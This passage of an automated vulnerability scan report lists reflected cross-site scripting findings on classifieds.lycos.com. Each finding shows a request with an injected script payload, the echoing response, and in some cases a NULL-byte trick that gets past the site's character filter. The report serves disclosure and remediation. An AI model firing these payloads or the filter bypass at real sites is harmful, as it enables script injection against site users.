GET /sale-free/?30dd1"><script>alert(1)</script>6bbefb1baf7=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:10 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-free/?30dd1"><script>alert(1)</script>6bbefb1baf7=1&mobile=1" rel="nofollow">
...[SNIP]...

1.103. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3add9"><script>alert(1)</script>643e66701bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-bed3add9"><script>alert(1)</script>643e66701bc/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-bed3add9"><script>alert(1)</script>643e66701bc/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805?mobile=1" rel="nofollow">
...[SNIP]...

1.104. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cf480"><script>alert(1)</script>5e3d57aa082 was submitted in the REST URL parameter 2. This input was echoed as cf480"><script>alert(1)</script>5e3d57aa082 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805%00cf480"><script>alert(1)</script>5e3d57aa082 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:05:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:05:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805%00cf480"><script>alert(1)</script>5e3d57aa082?mobile=1" rel="nofollow">
...[SNIP]...

1.105. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e2b"><script>alert(1)</script>f3ffee32f1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805?72e2b"><script>alert(1)</script>f3ffee32f1e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:04:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:09 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture%2Fbed; path=/
Set-Cookie: classifieds[lastpage][0][name]=Beds+%26+Bedroom+Sets; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805?72e2b"><script>alert(1)</script>f3ffee32f1e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.106. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-sofa/sofas-furnishings-other-2416111056

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 331be"><script>alert(1)</script>8eab472e6d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-sofa331be"><script>alert(1)</script>8eab472e6d8/sofas-furnishings-other-2416111056 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:25 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-sofa331be"><script>alert(1)</script>8eab472e6d8/sofas-furnishings-other-2416111056?mobile=1" rel="nofollow">
...[SNIP]...

1.107. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-sofa/sofas-furnishings-other-2416111056

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004e3ff"><script>alert(1)</script>38fe35f9b8a was submitted in the REST URL parameter 2. This input was echoed as 4e3ff"><script>alert(1)</script>38fe35f9b8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture-sofa/sofas-furnishings-other-2416111056%004e3ff"><script>alert(1)</script>38fe35f9b8a HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-sofa/sofas-furnishings-other-2416111056%004e3ff"><script>alert(1)</script>38fe35f9b8a?mobile=1" rel="nofollow">
...[SNIP]...

1.108. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-sofa/sofas-furnishings-other-2416111056

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2b58"><script>alert(1)</script>7ef5e310c7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-sofa/sofas-furnishings-other-2416111056?b2b58"><script>alert(1)</script>7ef5e310c7a=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:04:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:08 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture%2Fsofa; path=/
Set-Cookie: classifieds[lastpage][0][name]=Sofas; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-sofa/sofas-furnishings-other-2416111056?b2b58"><script>alert(1)</script>7ef5e310c7a=1&mobile=1" rel="nofollow">
...[SNIP]...

1.109. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-table/dining-table-dining-and-kitchen-2416111088

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce54"><script>alert(1)</script>88b33ce779f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-table3ce54"><script>alert(1)</script>88b33ce779f/dining-table-dining-and-kitchen-2416111088 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:10 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-table3ce54"><script>alert(1)</script>88b33ce779f/dining-table-dining-and-kitchen-2416111088?mobile=1" rel="nofollow">
...[SNIP]...

1.110. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-table/dining-table-dining-and-kitchen-2416111088

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e35a4"><script>alert(1)</script>b00d785867 was submitted in the REST URL parameter 2. This input was echoed as e35a4"><script>alert(1)</script>b00d785867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture-table/dining-table-dining-and-kitchen-2416111088%00e35a4"><script>alert(1)</script>b00d785867 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-table/dining-table-dining-and-kitchen-2416111088%00e35a4"><script>alert(1)</script>b00d785867?mobile=1" rel="nofollow">
...[SNIP]...

1.111. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-table/dining-table-dining-and-kitchen-2416111088

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84b59"><script>alert(1)</script>a9b434e50f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-table/dining-table-dining-and-kitchen-2416111088?84b59"><script>alert(1)</script>a9b434e50f4=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:44 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture%2Ftable; path=/
Set-Cookie: classifieds[lastpage][0][name]=Tables+%26+Stands; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-table/dining-table-dining-and-kitchen-2416111088?84b59"><script>alert(1)</script>a9b434e50f4=1&mobile=1" rel="nofollow">
...[SNIP]...

1.112. http://classifieds.lycos.com/sale-furniture/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e0ee"><script>alert(1)</script>bcff27a0c0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture5e0ee"><script>alert(1)</script>bcff27a0c0c/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:44 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture5e0ee"><script>alert(1)</script>bcff27a0c0c/?mobile=1" rel="nofollow">
...[SNIP]...

1.113. http://classifieds.lycos.com/sale-furniture/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6893"><script>alert(1)</script>be377872f04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture/?e6893"><script>alert(1)</script>be377872f04=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:04:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:11 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/?e6893"><script>alert(1)</script>be377872f04=1&mobile=1" rel="nofollow">
...[SNIP]...

1.114. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1851a"><script>alert(1)</script>c657708d1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture1851a"><script>alert(1)</script>c657708d1d/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:11 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture1851a"><script>alert(1)</script>c657708d1d/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146?mobile=1" rel="nofollow">
...[SNIP]...

1.115. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00434ac"><script>alert(1)</script>f0b202c5c34 was submitted in the REST URL parameter 2. This input was echoed as 434ac"><script>alert(1)</script>f0b202c5c34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146%00434ac"><script>alert(1)</script>f0b202c5c34 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
